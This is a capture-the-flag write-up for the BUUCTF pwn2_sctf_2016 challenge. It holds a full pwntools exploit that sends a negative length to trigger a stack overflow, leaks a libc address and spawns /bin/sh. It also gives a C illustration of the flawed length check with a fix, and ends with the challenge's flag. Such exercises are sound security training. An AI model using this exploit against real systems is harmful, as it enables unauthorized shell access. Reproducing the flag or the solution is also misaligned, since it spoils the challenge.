[BUUCTF] Pwn -- Pwn2_sctf_2016

Integer overflow + ret2libc

Description:

nc pwn.buuoj.cn 20087

If you need the libc, grab it yourself from https://github.com/giantbranch/pwn_deploy_chroot/tree/master/libcindocker


Solution:

An easy one, nothing much to say; just have fun with it.


The exploit is as follows:

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="i386", os="linux")
p = process('./pwn2_sctf_2016')
# p = remote('pwn.buuoj.cn', 20087)
elf = ELF('./pwn2_sctf_2016', checksec=False)
libc = ELF('./x86_libc.so.6', checksec=False)
addr_main = 0x080485B8      # return into main so the overflow can be triggered a second time
addr_format = 0x080486F8    # format string inside the binary, used to print the leaked pointer
plt_printf = elf.plt['printf']
got_printf = elf.got['printf']

# Stage 1: the length check accepts -1, so the read is effectively unbounded.
# Overflow the buffer and call printf(addr_format, got_printf) to leak printf's libc address.
pd = b'a' * 0x30
pd += p32(plt_printf)
pd += p32(addr_main)
pd += p32(addr_format)
pd += p32(got_printf)
p.sendlineafter(b'read? ', b'-1')
p.sendlineafter(b'data!\n', pd)
p.recvuntil(b'You said: ')
p.recvuntil(b'You said: ')

addr_printf = u32(p.recv(4))
libcbase = addr_printf - libc.sym['printf']
addr_system = libcbase + libc.sym['system']
addr_bin_sh = libcbase + next(libc.search(b'/bin/sh'))

# Stage 2: same overflow again, this time calling system("/bin/sh") from the leaked base.
pd = b'a' * 0x30
pd += p32(addr_system)
pd += p32(addr_main)
pd += p32(addr_bin_sh)
p.sendlineafter(b'read? ', b'-1')
p.sendlineafter(b'data!\n', pd)
success('addr_printf is ' + hex(addr_printf))
p.interactive()
```
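The "integer overflow" half of this challenge is why sending -1 as the length works: a signed count is only checked against its upper bound, then widened to size_t for the read. The following is an added illustration, not the challenge's source or the author's code; the buffer size and the exact shape of the check are assumptions, and the hardened version shows what the check should have looked like.

```c
#include <stddef.h>
#include <stdint.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_SIZE 32   /* assumed; the real buffer size is not stated in the writeup */

/* Assumed shape of the vulnerable check: only "too large" is rejected, so a
 * negative count such as -1 passes and becomes SIZE_MAX once cast for read().
 * Returns the length that would reach read(), or 0 if the request is rejected. */
size_t accepted_len_vuln(int n) {
    if (n > BUF_SIZE)
        return 0;            /* rejected */
    return (size_t)n;        /* -1 widens to SIZE_MAX here */
}

/* Hardened check: reject negatives before any widening, then bound by the buffer.
 * Returns the accepted length, or 0 if the request is rejected. */
size_t accepted_len_fixed(int n) {
    if (n < 0 || n > BUF_SIZE)
        return 0;
    return (size_t)n;
}

/* Wrapper that can never read past the buffer, whatever the caller asks for. */
ssize_t read_bounded(int fd, char *buf, size_t cap, int requested) {
    size_t n = accepted_len_fixed(requested);
    if (n == 0 || n > cap)
        return -1;
    return read(fd, buf, n);
}
```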

Flag:

flag{3e21ca08-0fb8-40da-9f1e-e01c35881006}